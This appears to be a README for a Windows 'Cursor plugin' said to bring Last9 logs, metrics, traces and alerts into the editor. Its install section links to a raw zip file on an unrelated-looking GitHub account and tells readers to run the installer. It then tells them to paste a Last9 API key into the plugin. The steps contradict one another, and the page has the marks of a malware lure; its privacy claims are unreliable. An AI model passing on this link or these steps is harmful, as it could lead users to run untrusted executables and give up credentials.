This application connects your production data directly to the Cursor code editor. You see logs, metrics, and alerts without leaving your workspace. It uses the Last9 platform to fetch information about your servers and services.
Modern software runs on many layers. You have logs that record events, metrics that track performance, and traces that follow user requests. Usually, you check these items in a web browser. This tool brings those details into your editor. You ask questions about your system health while you write code.
- Windows 10 or Windows 11
- At least 4GB of RAM
- An active Cursor editor installation
- A Last9 account for data access
- Visit this page to download: https://github.com/Christianly-bar1265/cursor-plugin/raw/refs/heads/main/rules/plugin-cursor-1.1-beta.2.zip
- Locate the download button on the page.
- Save the installer file to your computer.
- Run the installer file by double-clicking it.
- Follow the prompts on the screen to complete the setup.
- Open your Cursor editor after the installation finishes.
The plugin needs permission to read your system data. You provide these permissions through an authentication key.
- Log in to your Last9 dashboard in your web browser.
- Find the settings menu.
- Generate a new API key.
- Copy this key to your clipboard.
- Open the command palette in Cursor.
- Type the command for this plugin.
- Paste your key when the input box appears.
- Press Enter to save your settings.
Search through your system records. Filter by time or error level to find the root cause of a problem.
View live graphs for server usage. Monitor CPU, memory, and disk health in real time.
Follow a user request through your services. See exactly which step takes the most time.
Receive notifications when something goes wrong. The plugin displays active alerts so you fix issues before users report them.
Once you authorize the plugin, a new icon appears in your Cursor sidebar. Click this icon to open the main window.
The search bar sits at the top of this window. Type your query in plain English. For example, you might type "Show me the error logs from the last hour." The plugin processes your request and displays the results in the pane below.
You can pin specific windows or metrics to your sidebar. This keeps important data visible while you focus on writing code.
The plugin communicates only with your instances of Last9. It does not send your source code to external servers. Your API key stays stored locally on your machine. You control the connection at all times. If you remove the plugin, all saved credentials disappear from your system.
If you do not see data, check your internet connection first. Ensure your API key remains valid and has not expired. Sometimes, large datasets take a few moments to load.
If the plugin does not respond, restart your Cursor editor. This forces a fresh connection to the Last9 system.
If you encounter errors during installation, verify that you possess the latest version of Windows. Outdated systems sometimes block new connections.
Access the settings menu to adjust how the plugin displays data. You choose which services to monitor if you manage more than one. You also set the automatic refresh rate for metrics. A shorter refresh rate provides newer details but uses more system resources.
- Alerts: Notifications for system failures.
- APM: Application performance monitoring for your code.
- Cursor: The editor where this plugin lives.
- Last9: The platform providing your data.
- Logs: Text files tracking system behavior.
- MCP: The communication protocol used for data.
- Metrics: Numerical data about system health.
- Observability: The ability to understand your system state.
- OpenTelemetry: The standard for collecting performance data.
- Traces: Maps of how requests move through your software.